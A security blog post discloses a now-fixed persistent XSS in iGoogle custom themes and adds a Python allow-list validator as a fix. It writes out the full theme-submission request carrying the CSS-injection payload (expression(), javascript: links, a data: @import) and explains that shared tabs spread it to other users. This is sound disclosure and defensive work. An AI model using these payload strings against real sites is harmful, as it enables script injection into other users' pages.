Kos Security: A blog about security.

Hacking Google – Part 2

Vulnerability: Cross Site Scripting

Affects: Any browser that will execute JavaScript embedded in CSS. IE6, IE7, and the latest version of Opera were tested.

iGoogle (http://www.google.com/ig) was vulnerable to persistent XSS via CSS injection on a custom theme.

Authentication Status: exploitable both unauthenticated and authenticated


URL used in attack:
http://www.google.com/ig


Payload:
POST /ig/skin_submit_xhr?tmprivacy=1&et=4cdb0f0bQKHcNSc5&referrer=tm HTTP/1.1

{"title":"test","author":"test","description":"","skin":
        [{"background_image":"');}body{background-image:expression(alert(document.domain));
        -o-link:'javascript:alert(document.domain)';-o-link-source:current}/*","logo_color":"white","logo_hex_color":"FFFFFF",
        "background_color":"D1ECF9","gadget_border":"6685b8","gadget_top_background":"6685b8",
        "gadget_top_text":"CEECFC","tab_background":"D1ECF9","tab_border":"93BDD1",
        "tab_text":"3A5787","selected_text":"3A5787","gadget_icon":"00a9ff","icon_color":"00a9ff"}]}

How it’s reflected on the page:

When the iGoogle page loads, the payload fires immediately if the tab the theme is attached to is the selected one.
If that tab is not selected, the payload fires as soon as the user selects it.

GET /ig/skin_xml_to_css?hl=en&gl=us&v2=1&url=http://www.google.com/ig/tm%3Foutput%3Dxml%26te%3DFYvZBahVsoU&skindx=ix:0&fp=lUTDcevwYRs HTTP/1.1

....');}body{background-image:expression(alert(document.domain));-o-link:'javascript:alert(document.domain)';
-o-link-source:current}@import 'data:,*{x:expression(alert(document.domain))}';/*') no-repeat top center;}/* google logo */....
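The root cause visible in the two requests above is that the theme's string values are interpolated verbatim into a generated stylesheet, so a quote and a closing parenthesis in background_image close the url() token and everything after it becomes new CSS. The fix on the server side is an allow-list on each field before it ever reaches the stylesheet. The following is an added example for this post, not Google's code: the field names come from the POST body above, but the CSS layout it emits and the validation rules are assumptions made for illustration.

```python
"""Allow-list validation for user-supplied theme values before they are
interpolated into a generated stylesheet. Added example; not iGoogle's code.
Field names are taken from the skin_submit_xhr body on this page; the emitted
CSS rules are invented for illustration."""
import json
import re
from urllib.parse import urlsplit

# Six hex digits only: "FFFFFF" is fine, "FFF;}body{x:y" is not.
HEX_COLOR = re.compile(r"^[0-9A-Fa-f]{6}$")
# Characters a normal image URL needs. Deliberately excludes ' " ( ) ; { } \
# < > and whitespace, i.e. every character the payload above relies on to
# close the url() token and start a new rule or comment.
URL_SAFE = re.compile(r"^[A-Za-z0-9._~:/?#\[\]@!$&*+,=%-]+$")

COLOR_FIELDS = (
    "logo_hex_color", "background_color", "gadget_border",
    "gadget_top_background", "gadget_top_text", "tab_background",
    "tab_border", "tab_text", "selected_text", "gadget_icon", "icon_color",
)


class InvalidSkin(ValueError):
    """Raised when a theme value falls outside the allow-list."""


def validate_color(name, value):
    if not isinstance(value, str) or not HEX_COLOR.match(value):
        raise InvalidSkin(f"{name}: expected 6 hex digits, got {value!r}")
    return value.upper()


def validate_background_image(value):
    """Return a URL safe to place inside url("..."), or None when empty."""
    if value in ("", None):
        return None
    if not isinstance(value, str) or not URL_SAFE.match(value):
        raise InvalidSkin("background_image: characters not allowed in a CSS url()")
    parts = urlsplit(value)
    # Absolute http(s) only: this also rejects javascript: and the data: URL
    # seen in the reflected @import on this page.
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise InvalidSkin("background_image: must be an absolute http(s) URL")
    return value


def build_theme_css(skin):
    """Validate one skin object and emit CSS for it; raise InvalidSkin otherwise."""
    colors = {name: validate_color(name, skin.get(name)) for name in COLOR_FIELDS}
    image = validate_background_image(skin.get("background_image"))
    body_bg = "#" + colors["background_color"]
    if image is not None:
        body_bg += f' url("{image}") no-repeat top center'
    return (
        f"body{{background:{body_bg};}}\n"
        f".gadget{{border:1px solid #{colors['gadget_border']};}}\n"
        f".gadget-title{{background:#{colors['gadget_top_background']};"
        f"color:#{colors['gadget_top_text']};}}\n"
    )


def skin_from_submission(body):
    """Parse a skin_submit_xhr-style JSON body and return its CSS.

    Raises InvalidSkin for any value that cannot be emitted verbatim."""
    skin = json.loads(body)["skin"][0]
    return build_theme_css(skin)


# Constructed inputs: the malicious background_image value from the post above
# and a benign theme that differs only in that field.
BASE_SKIN = {
    "logo_color": "white", "logo_hex_color": "FFFFFF",
    "background_color": "D1ECF9", "gadget_border": "6685b8",
    "gadget_top_background": "6685b8", "gadget_top_text": "CEECFC",
    "tab_background": "D1ECF9", "tab_border": "93BDD1", "tab_text": "3A5787",
    "selected_text": "3A5787", "gadget_icon": "00a9ff", "icon_color": "00a9ff",
}
MALICIOUS_IMAGE = (
    "');}body{background-image:expression(alert(document.domain));"
    "-o-link:'javascript:alert(document.domain)';-o-link-source:current}/*"
)
BENIGN_IMAGE = "https://example.com/themes/sky.png"  # hypothetical URL


def is_rejected(background_image):
    """True when a submission carrying this background_image is refused."""
    body = json.dumps({"title": "test", "author": "test", "description": "",
                       "skin": [dict(BASE_SKIN, background_image=background_image)]})
    try:
        skin_from_submission(body)
    except InvalidSkin:
        return True
    return False


if __name__ == "__main__":
    print("malicious rejected:", is_rejected(MALICIOUS_IMAGE))  # True
    print("benign rejected:   ", is_rejected(BENIGN_IMAGE))     # False
    print(build_theme_css(dict(BASE_SKIN, background_image=BENIGN_IMAGE)))
```

The point of the design is that nothing is escaped or stripped: a value either matches a shape that is known to be inert inside the stylesheet (six hex digits, or a URL made only of characters that cannot terminate a url() token) or the whole submission is refused. A deny-list for expression( or javascript: would have missed the -o-link and @import 'data:...' variants that appear in the reflected response above.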

The Danger

A user can share a tab with other users via invitation. If the victim accepts the tab invitation, then the theme with the attached malicious CSS will be added to their page.

Resolution

This issue was resolved in about a week.
